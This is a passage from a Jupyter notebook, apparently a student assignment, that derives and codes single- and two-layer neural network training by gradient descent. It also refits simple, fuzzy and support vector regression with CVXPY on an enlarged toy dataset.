"def single_layer_NN(lr, w, maxiteration):\n \"\"\"lr - learning rate\\n\n w - initial value of w\\n\n maxiteration - define # of max iteration \"\"\"\n E0 = sum(0.5 * np.power((y_lp - 5 * (w * X_lp[:, 1] + 1)), 2)) # initialize Loss, before 1st iteration\n for i in range(maxiteration):\n if i > 0: # Starting 2nd iteration, E1 value give to E0\n E0 = E1 # Loss before iteration\n print(\"Iteration=\", i, \",\", \"Loss value=\", E0)\n gradient = np.mean((5 * (w * X_lp[:, 1] + 1) - y_lp) * 5 * X_lp[:, 1]) # calculate gradient\n step = gradient * lr # calculate step size\n w = w - step # refresh the weight\n E1 = sum(0.5 * np.power((5 * (w * X_lp[:, 1] + 1) - y_lp), 2)) # Loss after iteration\n a = 5 * (w * X_lp[:, 1] + 1) # the refreshed output\n\n if abs(E0 - E1) <= 0.0001:\n print('Break out of the loop and end at Iteration=', i,\n '\\nThe value of loss is:', E1,\n '\\nThe value of w is:', w)\n break\n return w, a, gradient\n\nw, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)",
"Iteration= 0 , Loss value= 114465.5\nIteration= 1 , Loss value= 155978551.88888893\nIteration= 2 , Loss value= 212573833341.70184\nIteration= 3 , Loss value= 289704182060049.94\nIteration= 4 , Loss value= 3.948205279520827e+17\nIteration= 5 , Loss value= 5.3807731798658535e+20\nIteration= 6 , Loss value= 7.333134415107596e+23\nIteration= 7 , Loss value= 9.993890943267017e+26\nIteration= 8 , Loss value= 1.3620077109202842e+30\nIteration= 9 , Loss value= 1.8561989670860753e+33\nIteration= 10 , Loss value= 2.5297027159144115e+36\nIteration= 11 , Loss value= 3.4475807520519955e+39\nIteration= 12 , Loss value= 4.6985019097878616e+42\nIteration= 13 , Loss value= 6.403307647874708e+45\nIteration= 14 , Loss value= 8.726685573526139e+48\nIteration= 15 , Loss value= 1.1893078591103693e+52\nIteration= 16 , Loss value= 1.6208366530732709e+55\nIteration= 17 , Loss value= 2.2089414745067798e+58\nIteration= 18 , Loss value= 3.010434412711674e+61\nIteration= 19 , Loss value= 4.10274127125176e+64\nIteration= 20 , Loss value= 5.591381053763105e+67\nIteration= 21 , Loss value= 7.620159308471914e+70\nIteration= 22 , Loss value= 1.0385060028668781e+74\nIteration= 23 , Loss value= 1.4153178094209863e+77\nIteration= 24 , Loss value= 1.9288521165351336e+80\nIteration= 25 , Loss value= 2.628717354290996e+83\nIteration= 26 , Loss value= 3.582521889321206e+86\nIteration= 27 , Loss value= 4.882405126787482e+89\nIteration= 28 , Loss value= 6.653938359214699e+92\nIteration= 29 , Loss value= 9.068255201788373e+95\n"
]
],
[
[
"## Q5 Two-layer NN",
"_____no_output_____"
],
[
"### First two iterations illustration",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"The above structure will be used to model Q5, with $b_1=b_2=1$ and initial values $w_1=w_2=1$. For $f_1$, the activation function is sigmoid activation function. Since the sample data implies linear relationship, for $f_2$, a linear activation function (specifically, an **identify activation function**) has been chosen. The loss function $E$ has been the same as Q4:\n$$\nE=\\sum_{i=1}^N \\frac{1}{2}(T_i-a_2)^2\n$$\nwhere $T_i$ is the target value for each input $i$ and $N$ is the number of observations in the training set. \n\nThe output $a_1$ and $a_2$ can be denoted as:\n$$\na_1=f_1(w_1p+b) \\quad a_2=f_2(w_2a_1+b)\n$$\nwhere\n$$\nf_1(x)=\\frac{1}{1+e^{-x}} \\quad \\frac{\\partial f_1}{\\partial x}=f_1(1-f_1)\\\\\nand \\quad f_2(x)=x \\quad \\frac{\\partial f_2}{\\partial x}=1\n$$",
"_____no_output_____"
],
[
"We can find the gradient for $w_1$ and $w_2$ by:\n\n$$\n\\frac{\\partial E}{\\partial w_2}=\\frac{\\partial E}{\\partial a_2}\\frac{\\partial a_2}{\\partial n_2}\\frac{\\partial n_2}{\\partial w_2}=(w_2a_1+b-T)*1*a_1=(w_2a_1+1-T)a_1\n\\\\\n\\frac{\\partial E}{\\partial w_1}=\\frac{\\partial E}{\\partial a_2}\\frac{\\partial a_2}{\\partial a_1}\\frac{\\partial a_1}{\\partial n_1}\\frac{\\partial n_1}{\\partial w_1}=(w_2a_1+b-T)*w_2*a_1(1-a_1)*p\\\\=\\frac{\\partial E}{\\partial w_2}*w_2*(1-a_1)*p\n$$\nwhere\n$$\na_1=f_1(w_1p+b)=\\frac{1}{1+e^{-(w_1p+1)}}\n$$\n\n**We can see that the gradient of $w_1$ can be calculated from the gradient of $w_2$ and the gradient of both weights ($w_1$ and $w_2$) only relate to the input and the initial values of the weights!**",
"_____no_output_____"
],
[
"**For the 1st iteration**, \n\n$$\nFor\\quad i=1, 2, 3, 4, 5, 6, \\quad a_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1\\\\\n$$\n\nFor $i=1:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\\\\n\\frac{\\partial E}{\\partial w_2}=10*1*1=10,\\quad \\frac{\\partial E}{\\partial w_1}=10*10*(1-1)*1=0\n$$\nFor $i=2:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\\\\n\\frac{\\partial E}{\\partial w_2}=9*1*1=9,\\quad \\frac{\\partial E}{\\partial w_1}=9*10*(1-1)*1=0\n$$\nFor $i=3:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\\\\n\\frac{\\partial E}{\\partial w_2}=8*1*1=8,\\quad \\frac{\\partial E}{\\partial w_1}=8*10*(1-1)*1=0\n$$\nFor $i=4:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\\\\n\\frac{\\partial E}{\\partial w_2}=7*1*1=7,\\quad \\frac{\\partial E}{\\partial w_1}=7*10*(1-1)*1=0\n$$\nFor $i=5:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\\\\n\\frac{\\partial E}{\\partial w_2}=6*1*1=6,\\quad \\frac{\\partial E}{\\partial w_1}=6*10*(1-1)*1=0\n$$\nFor $i=6:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\\\\n\\frac{\\partial E}{\\partial w_2}=5*1*1=5,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$",
"_____no_output_____"
],
[
"The sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=10+9+8+7+6+5=45$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.75$$",
"_____no_output_____"
],
[
"The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated. The value of $a_1$ and $a_2$ are both for all 6 observations. \n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=10-0.75=9.25\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=9.25*1+1=10.25\n$$",
"_____no_output_____"
],
[
"**For the 2nd iteration**, \n\n$$\nFor\\quad i=1, 2, 3, 4, 5, 6, \\quad a_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1\\\\\n$$\n\nFor $i=1:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-1=9.25\\\\\n\\frac{\\partial E}{\\partial w_2}=9.25*1*1=9.25,\\quad \\frac{\\partial E}{\\partial w_1}=9.25*9.25*(1-1)*1=0\n$$\nFor $i=2:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-2=8.25\\\\\n\\frac{\\partial E}{\\partial w_2}=8.25*1*1=8.25,\\quad \\frac{\\partial E}{\\partial w_1}=8.25*9.25*(1-1)*1=0\n$$\nFor $i=3:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-3=7.25\\\\\n\\frac{\\partial E}{\\partial w_2}=7.25*1*1=7.25,\\quad \\frac{\\partial E}{\\partial w_1}=7.25*9.25*(1-1)*1=0\n$$\nFor $i=4:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-4=6.25\\\\\n\\frac{\\partial E}{\\partial w_2}=6.25*1*1=6.25,\\quad \\frac{\\partial E}{\\partial w_1}=6.25*9.25*(1-1)*1=0\n$$\nFor $i=5:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-5=5.25\\\\\n\\frac{\\partial E}{\\partial w_2}=5.25*1*1=5.25,\\quad \\frac{\\partial E}{\\partial w_1}=5.25*9.25*(1-1)*1=0\n$$\nFor $i=6:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(9.25*1+1)-6=4.25\\\\\n\\frac{\\partial E}{\\partial w_2}=4.25*1*1=4.25,\\quad \\frac{\\partial E}{\\partial w_1}=4.25*9.25*(1-1)*1=0\n$$",
"_____no_output_____"
],
[
"The sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=9.25+8.25+7.25+6.25+5.25+4.25=40.5$$\nAverage the sum of gradient by $N=6$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.675$$\nThe new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated, The value of $a_1$ and $a_2$ are both for all 6 observations:\n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=9.25-0.675=8.575\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=8.575*1+1=9.575\n$$",
"_____no_output_____"
],
[
"### Code",
"_____no_output_____"
],
[
"Below is the code to estimate all weights using batch training, with the stopping criteria as change in loss function less than 0.0001. We can tell the iteration stopped at Iteration 62 and $w_1=10$ while $w_2=2.511$. We can tell that the $w_1$ hardly changes throughout the iterations. I did not show the first 60 iteration results since it makes the report wordy. ",
"_____no_output_____"
]
],
[
[
"def linear_activation_NN(C, lr, w1, w2, maxiteration):\n # C - set the slope of the f2: f2(x)=Cx\n # lr - learning rate\n # w1 - initial value of w1\n # w2 - initial value of w2\n # maxiteration - define # of max iteration\n a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # initialize output1 - a1\n a2 = C * (w2 * a1 + 1) # initialize output2 - a2\n E0 = sum(0.5 * np.power(y_lp - a2, 2)) # initialize Loss, before 1st iteration\n for i in range(maxiteration):\n if i > 0: # Starting 2nd iteration, E1 value will give to E0\n E0 = E1 # Loss before iteration\n # print(\"Iteration=\", i, \",\", \"Loss value=\", E0)\n gradient_2 = np.mean((w2 * a1 + 1 - y_lp) * C * a1) # calculate gradient for w2\n gradient_1 = np.mean(\n (w2 * a1 + 1 - y_lp) * C * w2 * a1 * (1 - a1) * X_lp[:, 1]) # use BP to calculate gradient for w1\n # gradient_1 = np.mean(gradient_2 * w2 * (1 - a1) * X_lp[:, 1])\n step_1 = gradient_1 * lr # calculate step size\n step_2 = gradient_2 * lr\n w1 = w1 - step_1 # refresh w1\n w2 = w2 - step_2 # refresh w2\n a1 = 1 / (1 + np.exp(-(w1 * X_lp[:, 1] + 1))) # refresh a1\n a2 = C * (w2 * a1 + 1) # refresh a2\n E1 = sum(0.5 * np.power(y_lp - a2, 2)) # Loss after iteration\n\n if abs(E0 - E1) <= 0.0001:\n print('Break out of the loop and the iteration converge at Iteration=', i,\n '\\nThe value of loss is:', E1,\n '\\nThe value of w1 is:', w1,\n '\\nThe value of w2 is:', w2)\n break\n return w1, w2, a1, a2, gradient_1, gradient_2\n\nw1, w2, a1, a2, gradient_1, gradient_2 = linear_activation_NN(C=1, lr=0.1, w1=10, w2=10, maxiteration=100)",
"Break out of the loop and the iteration converge at Iteration= 61 \nThe value of loss is: 8.75025313893184 \nThe value of w1 is: 9.999705441446167 \nThe value of w2 is: 2.5109311582607736\n"
]
],
[
[
"Below gives a plot on how the NN model fit to the current sample data points. ",
"_____no_output_____"
]
],
[
[
"# plot the fit\nx = np.linspace(-4, 10, 100)\ny = w2 * (1 / (1 + np.exp(-(w1 * x + 1)))) + 1\n# plt.close('all')\nplt.plot(x, y, c='red', label='y = f(w2 * a1 + b)')\nplt.title('Fitted line using two-layer NN')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.xlim((-5, 8))\nplt.ylim((-2, 8))\nplt.xlabel('x')\nplt.ylabel('y')\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Q6 Re-do Q1-Q5",
"_____no_output_____"
],
[
"Two additional observations, (2, 3) and (3, 4) are added and below is the scatterplot showing how the data sample looks like. ",
"_____no_output_____"
]
],
[
[
"ar = np.array([[1, 1, 1, 1, 1, 1, 1, 1], # intercept\n [1, 2, 3, 4, 5, 6, 2, 3], # x\n [1, 2, 3, 4, 5, 6, 3, 4]]) # y\n\n# plot the dot points\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.title('Visualization of training observations')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Simple Linear Regression",
"_____no_output_____"
],
[
"The simple linear regression fit similar to Q1 has been conducted as below. The estimated $slope=0.923$ and estimated $intercept=0.5$.",
"_____no_output_____"
]
],
[
[
"# Data preprocessing\nX_lp = ar[[0, 1], :].T # transpose the array before modeling\ny_lp = ar[2].T\n\n# Define and solve the CVXPY problem.\nbeta = cp.Variable(X_lp.shape[1]) # return num of cols, 2 in total\ncost = cp.sum_squares(X_lp * beta - y_lp) # define cost function\nobj = cp.Minimize(cost) # define objective function\nprob = cp.Problem(obj)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe estimated of a (slope) is:\", beta.value[1],\n \"\\nThe estimate of b (intercept) is:\", beta.value[0])",
"\nThe optimal value of loss is: 1.3846153846153055\n\nThe estimated of a (slope) is: 0.9230769232893655 \nThe estimate of b (intercept) is: 0.4999999991534938\n"
]
],
[
[
"The regression line has been plotted:",
"_____no_output_____"
]
],
[
[
"# Plot the fit\nx = np.linspace(0, 10, 100)\ny = beta.value[1] * x + beta.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = ax + b')\nplt.title('Fitted line using simple LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Fuzzy Linear Regression",
"_____no_output_____"
],
[
"The fuzzy linear regression fit similar to Q2 has been conducted as below. We can see that some spread was estimated for the intercept $A0$ because we are unable to fit the data perfectly this time and there will have to be some spread to cover the data points around the regression line. ",
"_____no_output_____"
]
],
[
[
"# Define threshold h (it has same meaning as the alpha in alpha-cut). Higher the h, wider the spread.\nh = 0.5\n# Define and solve the CVXPY problem.\nc = cp.Variable(X_lp.shape[1]) # for spread variables, A0 and A1\nalpha = cp.Variable(X_lp.shape[1]) # for center/core variables, A0 and A1\ncost = cp.sum(X_lp * c) # define cost function\nobj = cp.Minimize(cost) # define objective function\nconstraints = [c >= 0,\n y_lp <= (1 - h) * abs(X_lp) * c + X_lp * alpha, # abs operate on each elements of X_lp\n -y_lp <= (1 - h) * abs(X_lp) * c - X_lp * alpha]\n\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe optimal value of loss is:\", prob.value)\nprint(\"\\nThe center of A1 (slope) is:\", alpha.value[1],\n \"\\nThe spread of A1 (slope) is:\", c.value[1],\n \"\\nThe center of A0 (intercept) is:\", alpha.value[0],\n \"\\nThe spread of A0 (intercept) is:\", c.value[0])",
"\nThe optimal value of loss is: 8.0\n\nThe center of A1 (slope) is: 0.9999999999999999 \nThe spread of A1 (slope) is: 0.0 \nThe center of A0 (intercept) is: 0.5 \nThe spread of A0 (intercept) is: 1.0\n"
]
],
[
[
"The regression line has been plotted, along with the fuzzy spread. ",
"_____no_output_____"
]
],
[
[
"x = np.linspace(0, 10, 100)\ny = alpha.value[1] * x + alpha.value[0]\nplt.close('all')\nplt.plot(x, y, c='red', label='y = A1x + A0')\ny = (alpha.value[1] + c.value[1]) * x + alpha.value[0] + c.value[0]\nplt.plot(x, y, '--g', label='Fuzzy Spread')\ny = (alpha.value[1] - c.value[1]) * x + alpha.value[0] - c.value[0]\nplt.plot(x, y, '--g')\nplt.title('Fitted line using Fuzzy LR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"_____no_output_____"
]
],
[
[
"### Support Vector Regression",
"_____no_output_____"
],
[
"The support vector regression fit similar to Q3 has been conducted as below. Here a simpler version of SVR is used with $\\epsilon$ has been set to 1:\n$$\nminimize \\quad \\frac{1}{2}||w||^2$$\n\n$$\nsubject\\, to=\\left\\{\n\\begin{aligned}\ny_i-(w \\cdot x_i)-b\\le\\epsilon\\\\\n(w \\cdot x_i)-b\\le\\epsilon-y_i\\le\\epsilon\\\\\n\\end{aligned}\n\\right.\n$$\n\nThe fitted line and the hard margin has been plotted above the training set as well. The estimated $w=0.6$ and $b=1.4$.",
"_____no_output_____"
]
],
[
[
"# A simplified version without introducing the slack variables ξi and ξ*i\nepsilon = 1\nbw = cp.Variable(X_lp.shape[1]) # for b and w parameters in SVR. bw[0]=b, bw[1]=w\ncost = 1 / 2 * bw[1] ** 2\nobj = cp.Minimize(cost)\nconstraints = [\n y_lp <= X_lp * bw + epsilon,\n -y_lp <= -(X_lp * bw) + epsilon]\nprob = cp.Problem(obj, constraints)\nprob.solve(solver=cp.CPLEX, verbose=False)\n# print(\"status:\", prob.status)\nprint(\"\\nThe estimate of w is:\", bw.value[1],\n \"\\nThe estimate of b is:\", bw.value[0], )\n\nupper = X_lp[:, 1] * bw.value[1] + bw.value[0] + epsilon # upper bound of the margin\nlower = X_lp[:, 1] * bw.value[1] + bw.value[0] - epsilon # lower bound of the margin\nplt.close('all')\nx = np.linspace(.5, 6, 100)\ny = bw.value[1] * x + bw.value[0]\nplt.plot(x, y, c='red', label='y = wx + b')\nx = [[min(X_lp[:, 1]), max(X_lp[:, 1])]]\ny = [[min(lower), max(lower)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g')\ny = [[min(upper), max(upper)]]\nfor i in range(len(x)):\n plt.plot(x[i], y[i], '--g', label='margin')\nplt.title('Fitted line using SVR')\nplt.legend(loc='upper left')\nplt.scatter(x=ar[1], y=ar[2], c='blue')\nplt.axis('scaled')\nplt.show()",
"\nThe estimate of w is: 0.6000000017139642 \nThe estimate of b is: 1.3999999940011307\n"
]
],
[
[
"### Single-layer NN",
"_____no_output_____"
],
[
"#### First two iterations illustration",
"_____no_output_____"
],
[
"Similar to the Q4, \n**For the 1st iteration**, with initial value $w=10$:\n\n$$\n\\frac{\\partial E}{\\partial a}=a-T=5(wp_i+1)-T_i\\\\\n\\frac{\\partial f}{\\partial x}=5$$\n$$\\frac{\\partial x_1}{\\partial w}=p_1=1$$\n$$\\vdots$$\n$$\\frac{\\partial x_6}{\\partial w}=p_6=6$$\n$$\\frac{\\partial x_7}{\\partial w}=p_7=2$$\n$$\\frac{\\partial x_8}{\\partial w}=p_8=3$$\n\nFor $i=1$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*1+1)-1=54\\\\\n\\frac{\\partial E}{\\partial w}=54*5*1$$\nFor $i=2$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-2=103\\\\\n\\frac{\\partial E}{\\partial w}=103*5*2$$\nFor $i=3$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-3=152\\\\\n\\frac{\\partial E}{\\partial w}=152*5*3$$\nFor $i=4$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*4+1)-4=201\\\\\n\\frac{\\partial E}{\\partial w}=201*5*4$$\nFor $i=5$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*5+1)-5=250\\\\\n\\frac{\\partial E}{\\partial w}=250*5*5$$\nFor $i=6$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*6+1)-6=299\\\\\n\\frac{\\partial E}{\\partial w}=299*5*6$$\nFor $i=7$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*2+1)-3=102\\\\\n\\frac{\\partial E}{\\partial w}=102*5*2$$\nFor $i=8$,\n$$\n\\frac{\\partial E}{\\partial a}=a_i-T_i=5(wp_i+1)-T_i=5(10*3+1)-4=151\\\\\n\\frac{\\partial E}{\\partial w}=151*5*3$$\n\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=26105\n$$\nAverage the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=326.3125\n$$.",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=10-326.3125=-316.3125\\\\\na=[-1576.562, -3158.125, -4739.688, -6321.25 , -7902.812, -9484.375, -3158.125, -4739.688]\n$$",
"_____no_output_____"
],
[
"**For the 2nd iteration,** similar steps have been conducted as the 1st iteration and:\n\nThe sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w})=-822307.5\n$$\nAverage the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w})}{N}=-10278.844\n$$",
"_____no_output_____"
],
[
"The new $w$ and output $a$ is calculated:\n$$w=-316.3125-(−10278.844)=9962.531\\\\\na=[49817.656, 99630.312, 149442.969, 199255.625, 249068.281, 298880.938, 99630.312, 149442.969]\n$$",
"_____no_output_____"
],
[
"#### Code",
"_____no_output_____"
],
[
"Similar to Q4, **We can tell from the above that throughout the first 2 iterations, the updated fit $a$ more and more far away from the actual value. This is because of the learning rate=0.1 was set to be too large and cause the result to be oscillating and won't be able to converge.** Further discussion has been made in Q7 to explore for a proper learning rate in this case. \n\nFrom the code below, after 30 iterations the loss function value becomes larger and larger and won't be able to converge, which further proves the findings. ",
"_____no_output_____"
]
],
[
[
"w, a, gradient = single_layer_NN(lr=0.1, w=10, maxiteration=30)",
"Iteration= 0 , Loss value= 131068.0\nIteration= 1 , Loss value= 130036482.140625\nIteration= 2 , Loss value= 129028683663.17578\nIteration= 3 , Loss value= 128028711349045.31\nIteration= 4 , Loss value= 1.2703648883607445e+17\nIteration= 5 , Loss value= 1.2605195604759488e+20\nIteration= 6 , Loss value= 1.2507505338822601e+23\nIteration= 7 , Loss value= 1.2410572172446726e+26\nIteration= 8 , Loss value= 1.2314390238110266e+29\nIteration= 9 , Loss value= 1.2218953713764914e+32\nIteration= 10 , Loss value= 1.2124256822483233e+35\nIteration= 11 , Loss value= 1.2030293832108986e+38\nIteration= 12 , Loss value= 1.193705905491014e+41\nIteration= 13 , Loss value= 1.1844546847234587e+44\nIteration= 14 , Loss value= 1.1752751609168519e+47\nIteration= 15 , Loss value= 1.1661667784197463e+50\nIteration= 16 , Loss value= 1.157128985886993e+53\nIteration= 17 , Loss value= 1.1481612362463688e+56\nIteration= 18 , Loss value= 1.1392629866654596e+59\nIteration= 19 , Loss value= 1.130433698518803e+62\nIteration= 20 , Loss value= 1.121672837355282e+65\nIteration= 21 , Loss value= 1.112979872865779e+68\nIteration= 22 , Loss value= 1.104354278851069e+71\nIteration= 23 , Loss value= 1.0957955331899727e+74\nIteration= 24 , Loss value= 1.0873031178077507e+77\nIteration= 25 , Loss value= 1.0788765186447404e+80\nIteration= 26 , Loss value= 1.0705152256252437e+83\nIteration= 27 , Loss value= 1.0622187326266482e+86\nIteration= 28 , Loss value= 1.0539865374487916e+89\nIteration= 29 , Loss value= 1.0458181417835635e+92\n"
]
],
[
[
"### Two-layer NN",
"_____no_output_____"
],
[
"#### First two iterations illustration",
"_____no_output_____"
],
[
"The first two iterations calculation is enoughly similar to the Q5.\n**For the 1st iteration**, \n\n$$\nFor\\quad i=1, 2, 3, 4, 5, 6, \\quad a_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1\\\\\n$$\n\nFor $i=1:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-1=10\\\\\n\\frac{\\partial E}{\\partial w_2}=10*1*1=10,\\quad \\frac{\\partial E}{\\partial w_1}=10*10*(1-1)*1=0\n$$\nFor $i=2:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-2=9\\\\\n\\frac{\\partial E}{\\partial w_2}=9*1*1=9,\\quad \\frac{\\partial E}{\\partial w_1}=9*10*(1-1)*1=0\n$$\nFor $i=3:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\\\\n\\frac{\\partial E}{\\partial w_2}=8*1*1=8,\\quad \\frac{\\partial E}{\\partial w_1}=8*10*(1-1)*1=0\n$$\nFor $i=4:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\\\\n\\frac{\\partial E}{\\partial w_2}=7*1*1=7,\\quad \\frac{\\partial E}{\\partial w_1}=7*10*(1-1)*1=0\n$$\nFor $i=5:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-5=6\\\\\n\\frac{\\partial E}{\\partial w_2}=6*1*1=6,\\quad \\frac{\\partial E}{\\partial w_1}=6*10*(1-1)*1=0\n$$\nFor $i=6:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-6=5\\\\\n\\frac{\\partial E}{\\partial w_2}=5*1*1=5,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$\nFor $i=7:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-3=8\\\\\n\\frac{\\partial E}{\\partial w_2}=8*1*1=8,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$\nFor $i=8:$\n$$\n\\frac{\\partial E}{\\partial a_2}=a_2-T_i=(w_2a_1+1)-T_i=(10*1+1)-4=7\\\\\n\\frac{\\partial E}{\\partial w_2}=7*1*1=7,\\quad \\frac{\\partial E}{\\partial w_1}=5*10*(1-1)*1=0\n$$",
"_____no_output_____"
],
[
"The sum of gradient for the batch training is:\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_1})=0$$\n$$\\sum_{i}(\\frac{\\partial E}{\\partial w_2})=10+9+8+7+6+5+8+7=60$$\nAverage the sum of gradient by $N=8$ and the step size (learning rate=0.1) can be calculated as:\n$$s_1=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_1})}{N}=0$$\n\n$$s_2=0.1*\\frac{\\sum_{i}(\\frac{\\partial E}{\\partial w_2})}{N}=0.75$$",
"_____no_output_____"
],
[
"The new weight $w_1$, $w_2$ and output $a_1$ and $a_2$ can be calculated. The value of $a_1$ and $a_2$ are both for all 6 observations. \n$$\nw_1=w_1-s_1=10-0=10,\\\\\nw_2=w_2-s_2=10-0.75=9.25\\\\\na_1=\\frac{1}{1+e^{-(w_1p_i+1)}}\\approx1, \\quad i\\in [1,2,3,4,5,6]\\\\\na_2=w_2a_1+b=9.25*1+1=10.25\n$$",
"_____no_output_____"
],
[
